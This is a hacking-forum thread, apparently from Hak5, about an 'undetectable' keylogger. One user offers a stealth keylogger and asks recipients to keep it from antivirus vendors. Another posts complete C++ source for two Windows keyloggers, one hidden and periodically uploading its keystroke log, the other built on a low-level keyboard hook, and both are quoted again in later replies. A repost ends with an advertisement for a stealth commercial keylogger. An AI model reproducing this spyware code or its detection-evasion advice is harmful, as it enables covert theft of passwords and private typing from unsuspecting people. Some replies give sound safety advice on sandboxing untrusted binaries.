Undetectable Keylogger

[fafaffy]

This is a portable Keylogger, it does not install anything on the computer, if it downloads/creates anything, it will be made in the directory of the keylogger.

Example: all settings files will be in a text document where the keylogger is located.

Heres a online virus scan of my keylogger:

http://virusscan.jotti.org/en/scanresult/5...a3432fee4cf96aa

Features:

1. Able to hide in the background

2. Records keystrokes accurately

3. Saves the log in a text document

4. Records your clipboard

5. Make the keylogger show itself by Typing a word (If you misspell it, you got to type it again)

6. Kill the keylogger by typing a word

7. No internet connection required, but is optional for auto-update

8. Auto-Update check wont run if theirs no internet available

9. Records the title of the current window

10. Shows exact time of w/e to happen

----

Here is an example log that i did in like 2 minutes: (censored my email for obvious reasons)

----------- Release (5/17/2010 5:23:20 PM) ------------

----------- Clipboard update: 4. Records your clipboard(5/17/2010 5:23:20 PM) ------------

----------- Torrent Invite - Post New Thread - Mozilla Firefox (5/17/2010 5:23:21 PM) ------------

----------- Mozilla Firefox (5/17/2010 5:23:22 PM) ------------
face[Down Arrow]

----------- Facebook - Mozilla Firefox (5/17/2010 5:23:30 PM) ------------
ma[Down Arrow]

----------- Mozilla Firefox (5/17/2010 5:23:59 PM) ------------

----------- Gmail - Mozilla Firefox (5/17/2010 5:24:06 PM) ------------

----------- Gmail - Inbox - *******@gmail.com - Mozilla Firefox (5/17/2010 5:24:11 PM) ------------
rev[Down Arrow]

----------- Revolution - Mozilla Firefox (5/17/2010 5:24:22 PM) ------------

----------- Revolution :: Torrents - Mozilla Firefox (5/17/2010 5:24:31 PM) ------------
[shift]c[/shift]ounter [shift]s[/shift]trike [shift]s[/shift]io[bkspace][bkspace]ource

----------- Revolution :: Search results for "Counter Strike Source" - Mozilla Firefox (5/17/2010 5:24:54 PM) ------------

If you want this keylogger, you must meet the requirement below then PM Me.

---

Requirement:

1. Must be friendly

2. Promise this is for educational purposes only

3. Promise not to give this file to the antivirus people, I dont want this keylogger to be detectable

4. If you do use this and get in trouble in any way/shape/or form, it is not my problem

Remember, even if you exceed the requirements, but I dont trust you with the program, your not getting it.

F.A.Q.

-----

Q. Why should I trust you that this keylogger is clean, and that your not keylogging us?

A. Because I have no use for your info, and programming that will be a pain, especially with firewall

Q. Why didnt you post any screen shots?

A. Too lazy to do that now, maybe tomorrow or something.

Q. Why not release it to everyone?

A. I dont just trust anyone with this program, and puts it in a high risk of a anti-virus detecting it.

Q. What language was this coded in?

A. Visual Basic, I know the language sucks, but most anti-viruses dont pick out visual basic apps to contain viruses.

Things to know:

1. This hasnt been tested extensively, so it may crash

2. This wasnt ment to be released publicly so the auto-update may not work flawlessly 100% of the time. (Mainly made it for myself)

3. Some code was ripped from many different websites, so the code may be sloppy (may fix later in the future)

4. The auto-update checks my site to see whether theirs an update or not, make sure you dont block the site if you want to auto-update feature.

[mR.xx]

where the link plz

[Jen]

I tried to send you a pm, but it didn't work :(

[Mr-Protocol]

2 Post user so be weary.

Is the source included? If not, hard to trust someone with just 2 posts.

scan with VirusTotal.com

I'll play with it if i get a DL link...

Not to mention wrong forum section... This isnt really a "USB HACKS"

Edited June 3, 2010 by Mr-Protocol

[Jen]

Thanks for the heads up!

I know i should be scanning IF i ever get the link LOL

Seems like he wont' be comign back to this forum

[sablefoxx]

Never trust binaries, get the source and build your own if possible. Even if you do this there is still a small threat if you don't look at the source, or if the source has been deliberately obfuscated, that you will end up with malicious code on your box.

Scanning, even with Virus Total is far from an accurate gauge, I will actually test programs with Virus Total to make sure they have a low or no detection rate.

Sandbox / Virtual Machines are really the only reasonably safe method of running untrusted code without risking your main box.

Edited June 4, 2010 by sablefoxx

[Datablitz]

Can i have a pm with a link please?

[Mr-Protocol]

Never trust binaries, get the source and build your own if possible. Even if you do this there is still a small threat if you don't look at the source, or if the source has been deliberately obfuscated, that you will end up with malicious code on your box.

Scanning, even with Virus Total is far from an accurate gauge, I will actually test programs with Virus Total to make sure they have a low or no detection rate.

Sandbox / Virtual Machines are really the only reasonably safe method of running untrusted code without risking your main box.

I use virtual boxes for everything

Edited June 4, 2010 by Mr-Protocol

[TheRatherOdd1]

Sadly, places like Jotti and Virusscan are the perfect places for a Antivirus company to run a honeypot. I mean how many people upload malware to those sites to prove they are not detected. Then after a week or two they are suddenly detected. Same with sandboxes like Anubis.

[Wetwork]

It might be a moot point anyway because it seems that the poster has dropped off the hak5 radar and isnt accepting PM's unless the mods have done away with him. Hopefully someone else can make a decent o/s independent keylogger that we can play around with for strictly educational purposes because none of us would use this for nefarious means *sic*

[TheRatherOdd1]

I'll go ahead and post the source code of two different types of keyloggers.

#include <iostream>
#include <fstream>
#include "kekke.h"
#include <conio.h>

using namespace std;

int main(int argc, char *argv[])
{
    short character; //Declarations
    int count = 0;
    string log = "C:\\WINDOWS\\";
    
    TCHAR infoBuf[50]; //Getting computername
    DWORD bufCharCount = 50;
    GetComputerName(infoBuf, &bufCharCount);
    
    string loc = infoBuf;
    string los = ".log";
    string tot = log + loc + los;
    

    hide();
    ofstream temp;
    
             while(1) // main loop
             {
                    count++; //send us the log sometimes..
                    if(count == 3000)
                    {
                             count = 0;
                             upload(tot);
                    }
                    Sleep(10);
                    for(character = 8; character <= 222; character++) // Logging keys
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        {
                                    if(character >=39 && character <=64 )
                                    {
                                    temp.open(tot.c_str(), ios::app);
                                    temp << char(character);
                                    temp.close();
                                    }
                                    else if(character > 64 && character < 91)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         character+=32;
                                         temp << char(character);
                                         temp.close();
                                    }
                                    else if(character == VK_RETURN)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << "\nENTER ";
                                         temp.close();
                                    }
                                    else if(character == VK_SPACE)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << " ";
                                         temp.close();
                                    }
                                    
                                    else if(character == VK_CONTROL)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << "\nCTRL ";
                                         temp.close();
                                    }
                                    else if(character == VK_SHIFT)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << "\nSHIFT ";
                                         temp.close();
                                    }
                                    else if(character == VK_BACK)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << "!";
                                         temp.close();
                                    }
                                    else if(character == VK_TAB)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << "\n";
                                         temp.close();
                                    }
                                    else if(character == VK_OEM_PERIOD)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << ".";
                                         temp.close();
                                    }
                                    else if(character == VK_OEM_MINUS)
                                    {
                                         temp.open(tot.c_str(), ios::app);
                                         temp << "-";
                                         temp.close();
                                    }
                                    
                                    
                        }
                    }
             }
    return 0;
    
}

This is a GetAsyncKeyState keylogger. It hammers the API thousands of times a second to capture keys.

It can cause high cpu usage if not throttled correctly, and can potentially miss keys if the system is being bogged down by other programs. Also since it uses the API it's fairly easy to detect unless the API call in the binary and in memory is obfuscated.

This is one of the easier to create and use keylogger.

(Note) The header is missing and it seems that was the part used by this program to send logs. For educational uses only please.

[TheRatherOdd1]

#define _WIN32_WINNT 0x1337

#include <fstream>
#include <windows.h>

using namespace std;

HHOOK keyboardHook;

LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);

    // If key is being pressed
    if (wParam == WM_KEYDOWN) {
        
        ofstream out("keys.txt", ios::app);
        
        switch (p->vkCode) {

            // Invisible keys
            case VK_CAPITAL:    out << "[CAPLOCK]";        break;
            case VK_LSHIFT:        out << "[LSHIFT]";        break;
            case VK_RSHIFT:        out << "[RSHIFT]";        break;
            case VK_LCONTROL:    out << "[LCTRL]";        break;
            case VK_RCONTROL:    out << "[RCTRL]";        break;
            case VK_INSERT:        out << "[INSERT]";        break;
            case VK_END:        out << "[END]";            break;
            case VK_PRINT:        out << "[PRINT]";        break;
            case VK_DELETE:        out << "[DEL]";            break;
            case VK_BACK:        out << "[BK]";            break;

            case VK_LEFT:        out << "[left]";        break;
            case VK_RIGHT:        out << "[right]";        break;
            case VK_UP:        out << "[UP]";            break;
            case VK_DOWN:        out << "[DOWN]";        break;

            // Visible keys
            default:
                out << "[" << char(p->vkCode) << "]";
                

        }
        out.close();
    }

    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

void keepAlive()
{
    MSG message;
    while (GetMessage(&message,NULL,0,0))
    {
        TranslateMessage( &message );
        DispatchMessage( &message );
    }
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
    
    keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, 0);

    keepAlive();
    
    UnhookWindowsHookEx(keyboardHook);

    return 0;
}

This key-logger goes about logging keys in a entirely different manner. It inserts a application-defined hook procedure into the hook chain. This one so happens to detect keyboard inputs.

Using this style of hooks we can intercept keys and block them, or intercept the mouse messages. You can even intercept window messages and see messages in the queue.

As long as the hook passes the messages it captures efficiently, and is unhooked when the program is terminated this can be a very efficient way to capture keys. For example while playing WoW you can have a hook listen for certain keys to control the volume of your audio player or do other things when certain keys are pressed. You can even modify what keys are captured and return totally different keys. Like if a user presses K the user would see the key U was pressed. Because of this you can potential do some weird and funny stuff to your system, so be careful.

Most people think that you have to have a DLL to use SetWindowsHookEx, but as demonstrated in the above program this is not so. As long as the program you are using to create hooks can use pointers you don't have to have a DLL. Though I wouldn't recommend to try to do this in interpreted languages like C# or VisualBasic.net because of possible errors.

[TheRatherOdd1]

Oh forgot to mention the two key-loggers above only work with Windows. I'm not exactly sure what the API is for capturing keys in Linux or Mac. Rarely ever would you get infected with one on those systems unless you got pwned by a 0-day or was just plain stupid to run a untrusted program as root.

[millerbell]

This is a portable Keylogger, it does not install anything on the computer, if it downloads/creates anything, it will be made in the directory of the keylogger.

Example: all settings files will be in a text document where the keylogger is located.

Heres a online virus scan of my keylogger:

http://virusscan.jotti.org/en/scanresult/5...a3432fee4cf96aa

Features:

1. Able to hide in the background

2. Records keystrokes accurately

3. Saves the log in a text document

4. Records your clipboard

5. Make the keylogger show itself by Typing a word (If you misspell it, you got to type it again)

6. Kill the keylogger by typing a word

7. No internet connection required, but is optional for auto-update

8. Auto-Update check wont run if theirs no internet available

9. Records the title of the current window

10. Shows exact time of w/e to happen

----

Here is an example log that i did in like 2 minutes: (censored my email for obvious reasons)

CODE

----------- Release (5/17/2010 5:23:20 PM) ------------

----------- Clipboard update: 4. Records your clipboard(5/17/2010 5:23:20 PM) ------------

----------- Torrent Invite - Post New Thread - Mozilla Firefox (5/17/2010 5:23:21 PM) ------------

----------- Mozilla Firefox (5/17/2010 5:23:22 PM) ------------

face[Down Arrow]

----------- Facebook - Mozilla Firefox (5/17/2010 5:23:30 PM) ------------

ma[Down Arrow]

----------- Mozilla Firefox (5/17/2010 5:23:59 PM) ------------

----------- Gmail - Mozilla Firefox (5/17/2010 5:24:06 PM) ------------

----------- Gmail - Inbox - *******@gmail.com - Mozilla Firefox (5/17/2010 5:24:11 PM) ------------

rev[Down Arrow]

----------- Revolution - Mozilla Firefox (5/17/2010 5:24:22 PM) ------------

----------- Revolution :: Torrents - Mozilla Firefox (5/17/2010 5:24:31 PM) ------------

[shift]c[/shift]ounter [shift]s[/shift]trike [shift]s[/shift]io[bkspace][bkspace]ource

----------- Revolution :: Search results for "Counter Strike Source" - Mozilla Firefox (5/17/2010 5:24:54 PM) ------------

If you want this keylogger, you must meet the requirement below then PM Me.

---

Requirement:

1. Must be friendly

2. Promise this is for educational purposes only

3. Promise not to give this file to the antivirus people, I dont want this keylogger to be detectable

4. If you do use this and get in trouble in any way/shape/or form, it is not my problem

Remember, even if you exceed the requirements, but I dont trust you with the program, your not getting it.

F.A.Q.

-----

Q. Why should I trust you that this keylogger is clean, and that your not keylogging us?

A. Because I have no use for your info, and programming that will be a pain, especially with firewall

Q. Why didnt you post any screen shots?

A. Too lazy to do that now, maybe tomorrow or something.

Q. Why not release it to everyone?

A. I dont just trust anyone with this program, and puts it in a high risk of a anti-virus detecting it.

Q. What language was this coded in?

A. Visual Basic, I know the language sucks, but most anti-viruses dont pick out visual basic apps to contain viruses.

Things to know:

1. This hasnt been tested extensively, so it may crash

2. This wasnt ment to be released publicly so the auto-update may not work flawlessly 100% of the time. (Mainly made it for myself)

3. Some code was ripped from many different websites, so the code may be sloppy (may fix later in the future)

4. The auto-update checks my site to see whether theirs an update or not, make sure you dont block the site if you want to auto-update feature.

Here is a smart Myjad keylogger that works in totally stealth mode and it will not show up on any running program. keylogger monitors all activities on the computer where it is installed.

Go to check: http://download.cnet.com/Myjad-Keylogger-Pro/3000-2162_4-75978859.html

Edited August 28, 2013 by millerbell

[IronHead]

I'll go ahead and post the source code of two different types of keyloggers.

CODE

#include <iostream>

#include <fstream>

#include "kekke.h"

#include <conio.h>

using namespace std;

int main(int argc, char *argv[])

{

short character; //Declarations

int count = 0;

string log = "C:\\WINDOWS\\";

TCHAR infoBuf[50]; //Getting computername

DWORD bufCharCount = 50;

GetComputerName(infoBuf, &bufCharCount);

string loc = infoBuf;

string los = ".log";

string tot = log + loc + los;

hide();

ofstream temp;

while(1) // main loop

{

count++; //send us the log sometimes..

if(count == 3000)

{

count = 0;

upload(tot);

}

Sleep(10);

for(character = 8; character <= 222; character++) // Logging keys

{

if(GetAsyncKeyState(character)==-32767)

{

if(character >=39 && character <=64 )

{

temp.open(tot.c_str(), ios::app);

temp << char(character);

temp.close();

}

else if(character > 64 && character < 91)

{

temp.open(tot.c_str(), ios::app);

character+=32;

temp << char(character);

temp.close();

}

else if(character == VK_RETURN)

{

temp.open(tot.c_str(), ios::app);

temp << "\nENTER ";

temp.close();

}

else if(character == VK_SPACE)

{

temp.open(tot.c_str(), ios::app);

temp << " ";

temp.close();

}

else if(character == VK_CONTROL)

{

temp.open(tot.c_str(), ios::app);

temp << "\nCTRL ";

temp.close();

}

else if(character == VK_SHIFT)

{

temp.open(tot.c_str(), ios::app);

temp << "\nSHIFT ";

temp.close();

}

else if(character == VK_BACK)

{

temp.open(tot.c_str(), ios::app);

temp << "!";

temp.close();

}

else if(character == VK_TAB)

{

temp.open(tot.c_str(), ios::app);

temp << "\n";

temp.close();

}

else if(character == VK_OEM_PERIOD)

{

temp.open(tot.c_str(), ios::app);

temp << ".";

temp.close();

}

else if(character == VK_OEM_MINUS)

{

temp.open(tot.c_str(), ios::app);

temp << "-";

temp.close();

}

}

}

}

return 0;

}

This is a GetAsyncKeyState keylogger. It hammers the API thousands of times a second to capture keys.

It can cause high cpu usage if not throttled correctly, and can potentially miss keys if the system is being bogged down by other programs. Also since it uses the API it's fairly easy to detect unless the API call in the binary and in memory is obfuscated.

This is one of the easier to create and use keylogger.

(Note) The header is missing and it seems that was the part used by this program to send logs. For educational uses only please.

What language is this written in? looks like C++ but I am still learning C++ just want to make sure?

[GuardMoony]

Requirement:

1. Must be friendly

2. Promise this is for educational purposes only

3. Promise not to give this file to the antivirus people, I dont want this keylogger to be detectable

4. If you do use this and get in trouble in any way/shape/or form, it is not my problem

point 3. And yet you upload it yourself to virustotal. Thats like yelling. "HEY YOU AV GUYS. CHECK THIS FILE. ITS GOT SOMETHING NICE!".

Wouldnt be surprised if its detected within a month.